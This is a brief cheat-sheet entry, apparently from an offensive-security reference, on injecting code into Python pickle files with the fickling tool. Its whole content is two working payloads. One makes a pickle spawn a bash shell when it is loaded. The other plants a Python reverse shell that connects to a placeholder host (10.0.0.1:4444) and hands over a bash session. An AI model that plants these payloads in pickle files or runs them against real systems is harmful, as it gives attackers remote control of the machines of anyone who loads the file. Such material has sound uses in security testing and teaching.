icon

Pickle Code Injection

Last modified: 2024-07-17

Exploit

fickling --inject "import os; os.system('/bin/bash')" example.pkl

# Reverse shell (replace "10.0.0.1" and 4444 with your own)
fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl